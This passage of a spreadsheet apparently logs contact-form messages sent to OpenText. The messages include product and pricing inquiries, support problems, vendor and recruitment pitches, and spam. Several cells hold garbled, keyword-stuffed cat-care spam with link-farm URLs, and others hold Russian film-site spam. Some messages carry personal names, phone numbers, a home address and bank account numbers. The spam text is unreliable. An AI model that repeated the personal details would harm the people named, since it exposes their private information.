 &lt;i&gt;How to Tame aFeralCat: 14 Steps (wit Pictures) - wikiHow Your borwser indicates if you've visited this lnik&lt;/i&gt;.&lt;br&gt; Although it may sound like a dream come true, the Omega Paw Self вЂ“Cleaning LitterBoxis real and it works well to clean thecatlitterboxwithout thecato.&lt;br&gt;  _x000D_
  [url=http://crazy-cat-behavior.ml/interactive-cat/get-rid-of-tom-cat-urine-smell-46.html]Get rid of tom cat urine smell[/url] [url=http://crazy-cat-behavior.ml/all-cat-breeds/my-cat-keeps-peeing-and-pooping-in-the-house.html]My cat keeps peeing and pooping in the house[/url]  _x000D_
 How do you keepcatsout of oyuryard ? You may want torepelcatsto protect birds. You may want to keep yourcatsand other pets away from wanderingcars ..&lt;br&gt; &lt;h2&gt;PFDHow To:GetRidofCatWeeStains andSmells Your browser indicates if you've visited this link&lt;/h2&gt;.&lt;br&gt;  _x000D_
cat doors home depot _x000D_
 _x000D_
&lt;h4&gt;CatScratchingand Itching -CatWorld Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; &lt;strong&gt;Litter BoxTrainingCats-  Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
[url=http://crazy-cat-behavi</t>
  </si>
  <si>
    <t>I am looking for a listing of MBPM 9.x training sessions after the one you have listed for January 15, 2018?  We have a new hire starting in February and need to attend one.</t>
  </si>
  <si>
    <t>Can you tell me what versions of Brava viewer these keys are for? We purchased these licenses, but are not using many of them and are using the free viewer instead.  I want to see what version needs to be installed to possibly start using these licenses again.  We might have the installation files and be able to install older versions of the software._x000D_
400215_x000D_
376835_x000D_
329219_x000D_
379420_x000D_
406928_x000D_
328868_x000D_
328917_x000D_
328918_x000D_
360590_x000D_
362040_x000D_
362041_x000D_
400850_x000D_
376835_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>I need help in obtaining support access to Opentext. Other employees Have left the company and we need to have support access._x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Mark, I hope you’re doing well! _x000D_
I represent a Software company called Devlights Software Solutions, and I write to you because I’ll be visiting LA from March 5th to 10th and I was wondering if I could step by your office at Opentext and steal a couple of minutes of your time to introduce myself and tell you a little more about what we do. _x000D_
_x000D_
I’m really confident we can find an opportunity we both can seize for our companies._x000D_
If you are interested it would be great if we could schedule an appointment between those dates, and if not, I appreciate you’ve taken the time to read this email anyway._x000D_
_x000D_
Best Regards_x000D_
Juan Rossi_x000D_
</t>
  </si>
  <si>
    <t>Interested in getting an OpenText demo</t>
  </si>
  <si>
    <t>_x000D_
Hi,_x000D_
_x000D_
We noticed that you run a nice blog at opentext.com. Apps4Rent would like to sponsor a post on your blog. We are willing to pay a onetime fee to insert a Marketing message in one of your existing posts. An example message is: “Two useful technologies for working from anywhere – Cloud Desktop and Cloud SharePoint.”, with two dofollow links going to our websites._x000D_
_x000D_
We are a leading Cloud hosting provider for the last 14 years with excellent products that your audience could use._x000D_
_x000D_
I look forward to your reply._x000D_
 _x000D_
Adrian_x000D_
Apps4Rent LLC_x000D_
111 Dunnell Road_x000D_
Suite 201_x000D_
Maplewood, NJ 07040	_x000D_
Ph. 646-465-7613_x000D_
http://www.apps4rent.com</t>
  </si>
  <si>
    <t xml:space="preserve">OrangeHRM is the world's most popular open source HRIS.We have around 3 million users._x000D_
I have a potential client looking for  an integrated system.Your name was suggested by them.I would like to know if you would be interested in working with us. </t>
  </si>
  <si>
    <t>To inquire on your product, OpenText Fax2Mail. We are interested in using this service.</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry about new account.  </t>
  </si>
  <si>
    <t xml:space="preserve">Information about the Document Sciences Compuset bridge for Xpression Bridge, preferred solution is in the private cloud. </t>
  </si>
  <si>
    <t>Good afternoon, we are looking for document management system to be used within our company (we support internal clients in Slovakia and Switzerland mainly) and we are evaluating competitive products to yours.  We are based in Bratislava, Slovakia and would like to know if there is a solid partner in this region that could be contacted regarding the DMS._x000D_
_x000D_
Thank you for the recommendation._x000D_
Marian Vicena</t>
  </si>
  <si>
    <t xml:space="preserve">Hi. I am looking out for some job opportunity in open text. Currently i am working in Infosys , Limited and have a total experience of 3.00 years , in Java Language &amp; framework worked on : Spring-Hibernate. Please let me know if there's any job opportunity available._x000D_
Thanks and Regards,_x000D_
Shivangi Tripathi_x000D_
9971585501  </t>
  </si>
  <si>
    <t>I paid for the software and I just want to download it.  I confirmed my support email but it keeps telling me that I didn't.  I just want my software.  Why are you making this so difficult?</t>
  </si>
  <si>
    <t xml:space="preserve">In  Out Of Box Webtop  6.82.0000.0171, When  we  click show Properties check box in Properties page, the Name is displayed as Value._x000D_
Can you please help to resolve the issue._x000D_
</t>
  </si>
  <si>
    <t>We would like a trial of the RightFax server to be able to send Mail-To-Fax from our SAP Applications using a dedicated fax server. Thank you.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Happy New Year. Hope you are doing great._x000D_
I am interested in Open Text Media Management._x000D_
I believe OTMM integrates with systems like WCM, CRM, MDM, ERP, MRM, PIM,etc. However I was keen to understand which tools are supported by these._x000D_
For example, _x000D_
For PIM- Hybris, Magneto, etc._x000D_
For CRM- Drupal, Sitecore, etc._x000D_
_x000D_
Please do let me know your thoughts._x000D_
_x000D_
Best Regards,_x000D_
Nazneen</t>
  </si>
  <si>
    <t>We would like to implement your solution in Nigeria.</t>
  </si>
  <si>
    <t xml:space="preserve">we want to download and work on below software as trail basis and later we will purchase_x000D_
Trusted Link Enterprise Mapping Workbench 6.2 _x000D_
Trusted Link Operations Center Client Workbench 6.2 _x000D_
GXS Biz Manager 3.3 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
_x000D_
I work in AutoZubak company in Croatia, Europe and we are interested in your BI software solution._x000D_
_x000D_
Let me briefly present AutoZubak d.o.o. company. We are a privately owned company that runs a successful business for 38 years and does business in segments of sales and maintenance of new and used vehicles. AutoZubak, with more than 5.000 cars sold annually and with more than 80.000 cars serviced in aftersales division, is one of the biggest car dealers and services in SEE region. _x000D_
_x000D_
We are a market leader in a segment of independent service and sale of used vehicles in Croatia. _x000D_
_x000D_
What we need to know is do you work with compaies in Croatia, do you have any partner for this market?_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Stjepan Rados, Zagreb, Croatia_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
J'ai testé le produit OpenText Analytics, et je veut savoir le prix pour le OT Analytics et le serveur IHUB pour créer des tableaux de bord.</t>
  </si>
  <si>
    <t xml:space="preserve">I have created an account (using this email address). Can you please activate access to Knowledge Center / My Support._x000D_
Can you enable the ability to create support requests? I need to follow up on licenses we acquired for Searchable PDF._x000D_
_x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have no idea why I'm sending you guys an email but I am in the middle of creating an app idea and putting it together which I am looking to launch as soon as I find an investor but one of the features on the app is going to be called hummingbird which I typed hummingbird.com in the search bar and you guys popped up really weird... Anyways have a happy new year's guys! </t>
  </si>
  <si>
    <t>Hi,_x000D_
I like to know more about your right fax solution. Do used a PCI card installed in the fax server, or use a separate box (external to the fax server) for carrying the actual fax sending and receiving? Many Thanks in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I'd like to arrange for a OpenText RightFax Managed Services trial. Could you please also provide costs for your solution? Thanks._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
Chad_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Confirm TLS version support - Is TLS version 1.2 supported?</t>
  </si>
  <si>
    <t xml:space="preserve"> 27 May 2016 ... We have talked a lot about cat litter box problems before, but occcasions when cats pee on their owner's beds, shoes, clothes, and  Your Cat is Peeing on Your Bed  petMD&lt;/u&gt;.&lt;br&gt; &lt;u&gt;WhatVaccines does MyKittenNeed ? - Per Healtu Network Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
 [url=http://citikitty-cat.tk/colorful-cats/kitten-behavior-at-3-months.html]Kitten behavior at 3 months[/url] [url=http://citikitty-cat.tk/cat-virus/why-does-my-cat-pee-outside-litter-box-97.html]Why does my cat pee outside litter box[/url]  _x000D_
 3 Ways toDisciplineCats- wikiHow Your browser indicates if you've visited this link Expert Reviewed. wiki How toDisciplineCats . Three Methods: Getting Ready toDisciplineYourCatTrainingYourCatDisciplining YourCatCommunity Q&amp;A  /Discipline-Cats More results.&lt;br&gt; CatLitter Trays . We offer a range ofcatlitter trays, including simple open trays and enclosed hooded opotions for cats that prefer alittlemore  &lt;i&gt;Including results for &lt;/i&gt;.&lt;br&gt;  _x000D_
pet supplies catterick _x000D_
 _x000D_
 &lt;h4&gt;Need a goodspraytopreventcatfromscratchingfurniture Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; &lt;i&gt;catrepellentmatВ®How to -  Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
  [url=http://citikitty-cat.tk/medium-hair-cat/my-cat-isnt-peeing-or-pooping-13.html]My cat isnt peeing or pooping[/url] [url=http://citikitty-cat.tk/cat-tunnel-toy/what-to-expect-after-cat-spay-29.html]What to expect after cat spay[/url]  _x000D_
 HowOften DoCatsUrinate Per Day? - Pets Your browser indicates if you've visited this link Mostcatspeetwo to four times daily, but there's no definitive answer as tohowoften your kitty should urinate per day. Fluid intake and other factors affect ...   More results.&lt;br&gt; &lt;h3&gt;Estrus Cycles inCats VCA Animal Hospital Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
pet neuter clinic stanwood _x000D_
 _x000D_
Generally speaking, neutering has an effect on male cat behavior, but the degree to ... There's no g</t>
  </si>
  <si>
    <t>Schönen guten Tag und ein frohes neues Jahr,_x000D_
_x000D_
wir haben einen Kunden, der gerne für seine Distributoren im Ausland eine Plattform einführen würde, wodurch die Distributoren immer Zugriff auf die aktuellsten Marketingmaterialien haben, sie Daten herunterladen oder auch deren eigenen Kunden zur Verfügung stellen können. Beispiel für den Vertrieb, dass man 5 Dokumente auswählen kann und dann dem Interessenten eine Mail zuschickt, die dann direkte Downloadlinks für die Dokumente beinhaltet. Die Links sollen aber nach x Tage nicht mehr gültig sein._x000D_
_x000D_
Nach meinen bisherigen Recherchen könnten Sie mir hier eventuell weiterhelfen._x000D_
Ich soll unserem Kunden ein erstes Vorabangebot bis zum 5.1.2018 zukommen lassen._x000D_
Ich kann Ihnen gerne die Anforderungen zukommen lassen, sobald ich eine passende Mail-Adresse habe (leider online nicht auffindbar). ;)_x000D_
_x000D_
Könnten Sie mir hier weiterhelfen?_x000D_
Falls eine gute Zusammenarbeit entsteht, würden wir ggf. gerne Partner von Ihnen werden und Ihre Lösung auch weiteren Kunden vorstellen._x000D_
_x000D_
Bei Fragen melden Sie sich gerne._x000D_
Mit freundlichen Grüßen_x000D_
Christoph Schmidt_x000D_
- Geschäftsführer -</t>
  </si>
  <si>
    <t>Hi team,_x000D_
I am writing from NMB Bank Limited, Kathmandu, Nepal._x000D_
I wish to explore your solution for possible prospect in our digitization journey._x000D_
If you are interested in Nepal markets, i would like to discuss with your team on this._x000D_
_x000D_
roshan</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
_x000D_
The purpose of this letter is making suggestion for local representation of you company in Iran Market. We -NOOOA Holding Group- are an international Holding helping foreign companies to enter Iran markets; We also act as an outsourcing company for Iranian companies that are sourcing products or services from overseas, or like to expand in global context. _x000D_
_x000D_
    Backed by our regional knowledge and experience, and following lifting of sanctions, we can act as your Iran business advisor and exclusive representative in Rich Market of Iran, and facilitate offering and distributing your services in vast scales. Our services include-but not limit to: _x000D_
_x000D_
·         Making Sales Offices and reseller bases in regional context- Iran_x000D_
_x000D_
·         Marketing for our services (including awards, certifications, standards, etc.) in regional context - Iran _x000D_
_x000D_
·         Translating your website and offering in local languages_x000D_
_x000D_
·         Facilitating your transactions in Iran_x000D_
_x000D_
·         We welcome your suggestions and ideas for cooperation as well._x000D_
_x000D_
 _x000D_
_x000D_
    We will support and provide you unique opportunities for offering your quality services and products in this rich and growing market, and vice versa._x000D_
_x000D_
     In short, we benefit from vast an powerful contacts in regional context for offering your services to regional customers, and facilitate the administrative and legal process here. _x000D_
_x000D_
     If you are interested, please do not hesitate to ask any questions._x000D_
_x000D_
Regards_x000D_
_x000D_
Engr. Simin Seyyedi_x000D_
Managing Director_x000D_
NOOOA HOLDING GROUP LTD (H. A. NOVIN PARSIAN)_x000D_
KARPIRA International Recruitment Agency_x000D_
Mobile: +98-9333003315_x000D_
Website:www.investment.noooa.com, www.business.noooa.com,www.noooa.com_x000D_
Email Address: s.seyyedi@noooa.com, s.seyyedi1@gmail.com_x000D_
LinkedIn: www.linkedin.com/company/noooa-holding_x000D_
                 www.linkedin.com/company/noooa-investment_x000D_
Twitter: twitter.com/NOOOAHolding_x000D_
Facebook: facebook.com/pages/NOOOA-Holding/223829</t>
  </si>
  <si>
    <t>I am planning to undergo a training on Captiva designer from my home land (India). However I'm not sure if there will be trainings conducted here. _x000D_
If Yes, also please let me know the training cost (in Rupees).</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi, _x000D_
_x000D_
I have visited your site  and found  that your content is  excellent. Your site is professional and offers excellent value to your visitors._x000D_
_x000D_
I noticed that you have linked to other sites and thought my website might be of interest to you and your website visitors. Actually we Provide Bulk SMS  Services , such as Long Code  &amp; Short Code SMS services . _x000D_
_x000D_
As our websites and target audience are closely related but we are not competing in any way, I hope that you will do a reciprocal link exchange with us. I have provided my site's details below, could you please let me know exactly what details to use when I link to your site._x000D_
_x000D_
--------------------------------------------------------------------------------------------_x000D_
_x000D_
Anchor Text:_x000D_
Bulk SMS India_x000D_
_x000D_
Link:_x000D_
https://kapsystem.com/_x000D_
_x000D_
_x000D_
--------------------------------------------------------------------------------------------_x000D_
_x000D_
 I look forward to your favourable response, and thank you in advance for your time and consideration. Please send your link details to us so that we can also add and inform you within few hours. _x000D_
_x000D_
Kind Regards,_x000D_
Brian_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to schedule demonstration of your AI Magellan on January 3 rd at your Waterloo office between 10AM and 1PM , please let me know if this is possible. Our CEO will be it town. Thanks_x000D_
Edward Twardus </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;i&gt;WhatDiseasesDo Fleas Cause?  PetCareRx Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; Find and save ideas about Litter box covers on Pinterest.  See more ideas about Diy litter box cover,  own cat litteer box cover ofr  10 Ways to Createa More Appealing Litter  To trap more litter inside the cover,maketh cover twice as long as the litter box. This way the cat has to step out of the litter and onto the box  and Functional Cat Ltiter Box Cover : 7 Steps&lt;/h4&gt;.&lt;br&gt;  _x000D_
 [url=http://cat-love-nips.gq/cheap-cat-litter/65-best-litter-to-use-for-cats.html]Best litter to use for cats[/url] [url=http://cat-love-nips.gq/silver-bengal-cat/army-cats-training-metl.html]Army cats training metl[/url]  _x000D_
 YourCat Why is mycatscratching? CatHealth Advice Your browser indicates if you've viisited this link Why is mycatscratching? ... If yourcactontinues to itch andscratchafterthe flea products have been given the chance to work, ...   More results.&lt;br&gt; STRIPED, SPOTTED AND TICKED CATS ... pattern breaking through so strongly that the cat appears to be a tabby/spotted Oriental or a ... as tabby stripes,  Tabby cat - Wikipedia &lt;/h4&gt;.&lt;br&gt;  _x000D_
cat flea control product comparison _x000D_
 _x000D_
 ASPCA  American Society for the Prevention of Cruelty to Animals Your browser indicates if you've visited this link Learn more about the ASPCA's work to rescue animals from abuse, pass humane laws and share resources with shelters nationwide. Join ut fight today!  More results.&lt;br&gt; &lt;i&gt;CatTerritorialBehavior and Problems - Puppy Training Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
  [url=http://cat-love-nips.gq/silver-bengal-cat/pets-at-home-vip-feliway.html]Pets at home vip feliway[/url] [url=http://cat-love-nips.gq/silver-bengal-cat/fixed-cat-still-spraying-26.html]Fixed cat still spraying[/url]  _x000D_
 CatColorsFAQ: CommonColors-CatFanciers Chat Your browser indicates if you've visuted this link CatColorsFAQ: CommonColors . ... This is the pattern of the Siamesecat , but many o</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
 _x000D_
  As the Managing Director of KARPIRA International Recruitment Agency- an proactive staffing&amp; recruiting service provider in Iran- we have candidates willing to work abroad. Professions of candidates are different- Hospitality, engineering, Sales, teachers, IT, general workers, etc. _x000D_
  We have provided professional staffs and also workers for many famous companies across the world, including: Ritz Carlton Hotel Company LLC (Doha-Qatar)- Topend Ceilings (Perth- Australia)- Zain International Group (Baghdad- Iraq)- Vano Group (Erbil- Iraq), and have shaped partnership with top recruitment agencies as well.   _x000D_
_x000D_
   For our candidates who live in Iran, we will manage  their visa and residence permit issues with with assistance of our legal partners abroad._x000D_
  _x000D_
  So since we have found your organization as a company with good conditions for international candidates, we can offer our high-quality candidates for your positions, or you can source jobs or (even unpaid) internship placements for them; so please provide us with your comments in this respect._x000D_
 _x000D_
  _x000D_
  Best Regards_x000D_
_x000D_
Engr. Simin (Samaneh) Seyyedi_x000D_
Managing Director_x000D_
NOOOA Group (H.A. NOVIN PARSIAN Group)_x000D_
KARPIRA International Recruitment Agency_x000D_
Postal Address: No.4, Ahmadabad 21, Ahmadabad Street, Mashhad, Iran_x000D_
ZIP CODE: 9183813199_x000D_
Office: +98 (51) 38459273_x000D_
Mobile: +98-9333003315 _x000D_
Website: www.karpirajobs.com, www.noooa.com _x000D_
LinkedIn: www.linkedin.com/company/karpira-international-recruitment-agency/_x000D_
Email Address: s.seyyedi@noooa.com, s.seyyedi1@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am looking for a developer who can design and create a company website for primarily posting advertisements and contacting sellers for services etc. Something like https://www.onmap.ae/_x000D_
_x000D_
The developer will provide a company email address/hosting services/ URL registration and complete functional website._x000D_
Some features expected are:_x000D_
•         Anyone can list a product/service for sale._x000D_
•         Creating a listing is absolutely free._x000D_
•         Paid options to enhance your listing. (At a later stage)_x000D_
•         Buyers can see product pictures and other details without registering._x000D_
•         Buyer can directly get in touch with the seller._x000D_
•         User-Generated Reviews_x000D_
•         Search option_x000D_
_x000D_
Some of the categories can include:_x000D_
•         Business_x000D_
•         For sale_x000D_
•         Property_x000D_
•         Jobs_x000D_
•         Services_x000D_
•         Motors_x000D_
•         Community and_x000D_
•         Pets._x000D_
•         Online chat service_x000D_
Visitors have to register, login to post an advert._x000D_
The developer will provide an interface that allows me to add categories, monitor content, advertise products and maintain the website._x000D_
Please give me a quote and the time frame for this project._x000D_
_x000D_
At a later stage I would like to include a system where people pay by credit card for services and products. An app that can be downloaded for e commerce. What would this require and what will be this development cost?_x000D_
 _x000D_
Thanks_x000D_
Examples of websites_x000D_
https://doukani.com_x000D_
http://www.abentra.com_x000D_
https://www.onmap.ae/_x000D_
</t>
  </si>
  <si>
    <t>Had been trying to make payment for days. after i checkout to paypal it shows :"Things don't appear to be working at the moment. Please try again later." please help</t>
  </si>
  <si>
    <t>kuqqha@contmy.info</t>
  </si>
  <si>
    <t>Привет! прикольный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] Лучшие исторические фильмы 2017 бесплатно [/b] [url=http://kinobibly.ru/]http://kinobibly.ru/[/url] _x000D_
Здесь: http://kinobibly.ru/drama/11506-drug-chingoo-2001.html Смотреть Друг / Chingoo (2001) онлайн бесплатно _x000D_
Здесь: http://kinobibly.ru/drama/5276-baleriny-bunheads-sezon-1-2012.html _x000D_
Тут: http://kinobibly.ru/multfilmy/ Лучшие мультфильмы 2017 список _x000D_
Тут: [url=http://kinobibly.ru/multfilmy/] 2017 список лучшие мультфильмы [/url] _x000D_
Здесь: [url=http://kinobibly.ru/istoricheskiy/] Лучшие исторические фильмы 2017 бесплатно [/url] Лучшие исторические фильмы 2017 бесплатно</t>
  </si>
  <si>
    <t>for Pan card Address :-    Smt.Kalamma w/o Late Hiriyanna Arkasali, Gunjalli street, Ward No.2,  Gangavathi, District: Koppal, State:Karnataka, INDIA.</t>
  </si>
  <si>
    <t>Привет! прикольный у вас сайт! _x000D_
Нашел интересную базу кино:  [url=http://kinobibly.ru/]Лучшая фантастика 2017 список[/url] _x000D_
Тут: http://kinobibly.ru/muzykalnye/3177-kto-sprosit-u-moego-serdca-koi-mere-dil-se-poochhe-2002.html Смотреть Кто спросит у моего сердца? / Koi Mere Dil Se Poochhe (2002) онлайн бесплатно _x000D_
Здесь: http://kinobibly.ru/drama/813-slaboe-zveno-the-passenger-2005.html _x000D_
Тут: http://kinobibly.ru/uzhasy/ Список 2017 лучшие ужасы _x000D_
Тут: [url=http://kinobibly.ru/multfilmy/] 2017 список лучшие мультфильмы [/url] _x000D_
Тут: [url=http://kinobibly.ru/multfilmy/] Лучшие мультфильмы 2017 список [/url] Лучшие мультфильмы 2017 список</t>
  </si>
  <si>
    <t>Hello - I need access to Documentum software just like in past with EMC. WIth EMC we had access to the software store and were able to download software for evaluations. Kindly do the needful.</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to learn more about your product. I'm helping build out a list of K-12 Enterprise Systems that are used by California school districts. Currently we have identified over 300 systems (e.g. SIS, Family Notification, Safety, Student Registration, etc.) across 40 different product categories._x000D_
_x000D_
We learned about your company through a survey we conduct of California Ed-Tech Leaders that asks them to identify the systems they are using at their schools. Several district leaders mentioned your product, so we created a product page for it and are currently listing it on our site: _x000D_
_x000D_
https://www.schooltechnologyleadership.com/systems/document-scanning-retention/emc-applicationxtender _x000D_
_x000D_
Before I go any further I just wanted to assure you - we aren't trying to sell you anything. We are simply maintaining a website of the most current products being used to run California school districts. I want to make sure we have up-to-date information, as well as invite you to join the site as a vendor (again, no fee), so that you can claim your product page, post blog notices, answer customer questions, and have access to all of our content (again, free!)_x000D_
_x000D_
So, what's the catch? - There is none. We are creating an online community of Ed-Tech vendors and end-users that focuses on system integration. Since your product is being used by California districts want want you and your team to be a part of our community too._x000D_
_x000D_
If you need any help navigating the website or have any questions, please feel free to get in touch with me._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;strong&gt;Why is MyCatPeeingso Much? - Pet Health Network  Pet ... Your browser indicates if you've visited this linnk&lt;/strong&gt;.&lt;br&gt; Find out how to keep indoor ats entertained during the day. ... In cases where cats do have to be kept inside all the time, I do think it is very important for  Busters: Tips to Help Keep Your Indoor Cat Happy&lt;/h3&gt;.&lt;br&gt;  _x000D_
 [url=http://cat-expert-questions.tk/cat-taking/so-phresh-cat-litter-unscented-37.html]So phresh cat litter unscented[/url] [url=http://cat-expert-questions.tk/grey-tabby-kitten/at-what-age-does-a-male-cat-start-to-spray-12.html]At what age does a male cat start to spray[/url]  _x000D_
 &lt;h2&gt;How to Repel FeralCatsCatRepellent HavahartВ® US Your browser indicates if you've visited this link&lt;/h2&gt;.&lt;br&gt; &lt;u&gt;How Did YourMaleCat'sPersonalityChangeAftterNeutedring ... Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
hlw to stop my kitten from attacking me _x000D_
 _x000D_
 Over the last 12 years we had 2 great cats. They were indoor/outdoor, kept in at nite. They were great hunters! We lost them a few years ago to old.&lt;br&gt; &lt;i&gt; How to Litter Train Kittens. What You Need to Know, Now &lt;/i&gt;.&lt;br&gt;  _x000D_
  [url=http://cat-expert-questions.tk/cat-massage/92-power-pet-door-manual.html]Power pet door manual[/url] [url=http://cat-expert-questions.tk/grey-tabby-kitten/how-to-care-for-a-cat-palm-19.html]How to care for a cat palm[/url]  _x000D_
 &lt;h4&gt;Greytabbykitten Etsy Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; Why does your cat rub up againstyou ? Cats have ... Some cats, when they are ... Why do cats roll over on their  -Why does my dog prostrate (stretch )? - Pets  We ask animal behaviorist Dr. Sharon Crowell-Davis to tell us why cats roll around ... Why Doee My  Roll Around ... ew do a good stretch,  Does My Cawt Stretch When He SeesMe? - The  Why do cats"bowand stretch"? ... of communicating with us and telling us waht they need. ... Mihgt HelpYou . RE: Why do cats &amp;quot;bow and stretch&amp;quot;?.&lt;br&gt;  _x000D_
how to train an older cat t</t>
  </si>
  <si>
    <t xml:space="preserve">One user gets error "Cannot fax file xyzfile.pdf" when faxing. Doesn't look like it's converting PDF to TIF properly. Sends TIF files fine, but not PDF. </t>
  </si>
  <si>
    <t>Hello, Cricket Media is in the process of moving to a new DAM system and would like some information on features and pricing. I am available to talk on Jan 3rd or 4th if anyone is available. We have around 30 employees and about 30,000 digital assets, mostly documents and images. _x000D_
_x000D_
Thanks,_x000D_
Will</t>
  </si>
  <si>
    <t>I am a current RightFax customer, I wanted to know what the most current version is and if I need to upgrade.</t>
  </si>
  <si>
    <t>Good Day, could you please let me know when the end-of-support or end-of-life date for the software OpenText Archive Server version 16.2.1 ?_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Having trouble getting a new selection codes products/GTINs uploaded to the catalog. No errors reported - they simply are not getting to the catalog. Inovis shows the file was received. I have a document with screen shots from the Active Catalog side, and from the Inovis side. </t>
  </si>
  <si>
    <t>Photos come in as media text and can't open_x000D_
Also can't send photos in text they return as unable to send_x000D_
Just started having this problem  need to know how to fix</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to speak with someone regarding an employment verification related to a mortgage application.  A form will need to be completed as we are seeking an income breakdown. These questions are time sensitive so I would appreciate a call back at your earliest convenience with a fax or email address to send the form.  We can be reached at 855.550.6772.  When calling, please use reference number 17187965.  If you prefer, please provide me with the name and contact information for an authorized representative.  I look forward to hearing from you._x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam, _x000D_
_x000D_
I wanted to send you a video we recently recorded with one of our successful partners during his visit to Bulgaria, Paul James - VP of Software Development at The Intellection Group._x000D_
_x000D_
Paul has a passion for helping clients and thrives when faced with the challenges of creating something out of nothing, solving hard problems, and designing deliverables that are a pleasure to use and a dream to maintain. When deadlines allow, he heads into the outdoors, makes music, reads sci-fi and fantasy literature, and of course, experiments with the latest tech gadgets._x000D_
_x000D_
Contact me should You decide You need our assistance in any project._x000D_
_x000D_
https://www.youtube.com/watch?v=9NIfQI05CUE_x000D_
_x000D_
All the best, _x000D_
Andrey_x000D_
_x000D_
_x000D_
Andrey Genchev_x000D_
Business Development_x000D_
Prime Holding JSC_x000D_
m: +44 1 590 700 027_x000D_
e: andrey@primeholding.com_x000D_
w: www.primeholding.com</t>
  </si>
  <si>
    <t>The time on my right fax is wrong, please advise on how to correct this--Thanks</t>
  </si>
  <si>
    <t>Client in Houston, TX is interested in new version of eDocs - using version 5 currently.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I hope you are doing well,_x000D_
Are you looking to beat your competitors in online business?_x000D_
We provide guarantee of the keywords on Google page 1st within the projected Google page 1st time line._x000D_
There will be no set up fee or any other hidden charge. So you just have to pay your monthly SEO fee and no need to sign any contract._x000D_
Please revert back to us if interested to know more information related to price and time line projection._x000D_
I will look forward to your reply._x000D_
_x000D_
Regards,_x000D_
Sales Executive_x000D_
</t>
  </si>
  <si>
    <t>Bonjour _x000D_
_x000D_
Nous sommes revendeur pour le Client Société Générale et aurions besoin du Prix Client pour le produit suivant_x000D_
-	OpenText : produit Host explorer et Exceed_x000D_
Par Avance merci de votre Aide et retour._x000D_
Cordialement _x000D_
Carmen Montiel</t>
  </si>
  <si>
    <t>We would like to discuss with you how OpenText could automate our document filing, naming and searching process. Please contact me at your earliest convenience.</t>
  </si>
  <si>
    <t>Abstimmung Bankverbindung Easylink Services Int. Ltd Reading, Berkshire, Account 632-7354. Wir zahlen immer noch an die IBAN GB25NWBK50302011704160, seit Mai steht eine andere BV auf den Rechnungen (GB78CITI18500817763778), das ist unserer Rechnungsprüfung bei der Dezember-Rechnung aufgefallen (!). Gibt es die Natwest Bank trotzdem noch? Müssen wir anpassen, oder können wir so weitermachen?_x000D_
Vielen Dank!</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have a client who is a partner at a law firm. They use your software at his law firm. He is planning on leaving the law firm and starting his own practice and would like to start using your software AND also be able to migrate his existing files so he can access them in the same way on his personal computer. How can we migrate his existing information? Tomorrow is his last day, so if it's possible to address this quickly, then it would be great. Not sure if his current firm has a support contract. The firm's name is: Doar Rieck DeVita Kaley &amp; Mack in New York. http://www.doarlaw.com</t>
  </si>
  <si>
    <t>Looking for renewal pricing for our client Husky for the below:_x000D_
Application Governance &amp; Archiving add-on bundle for Sharepoint  (CLM version)_x000D_
OpenText Annual Miantenance Doc Management Application_x000D_
Vendor Invoice Management Solution for SAP  qty: 750000</t>
  </si>
  <si>
    <t>How much would it be to purchase a RightFax Express with support?</t>
  </si>
  <si>
    <t>We purchased Myriad GL from Informative Graphics in 2013.  Is this product still available for maintenance / purchase?  We previously purchased under the name of IFMC, (Iowa Foundation for Medical Care), but have had a company name change to Telligen.  Thank you.</t>
  </si>
  <si>
    <t>We are looking at finding/creating different options in staying connected with EasyLink.  Is there someone that I can chat with or ask questions?</t>
  </si>
  <si>
    <t>I've had Myriad GL software and for the past several months it has not worked.  The IT dept today informed me that it is no longer a software to update.  Please advise what replaced it as I have 2 licenses, one works and one does not.  Thank you.</t>
  </si>
  <si>
    <t>I AM TRYING TO PAY FOR THE RENEWAL NOTICE THAT WE HAVE RECEIVED REFERENCE #RC210552, CONTRACT #A173096.  CAN SOMEONE CONTACT ME SO I CAN PAY VIA CREDIT CARD.  THANK YOU.</t>
  </si>
  <si>
    <t>Hello_x000D_
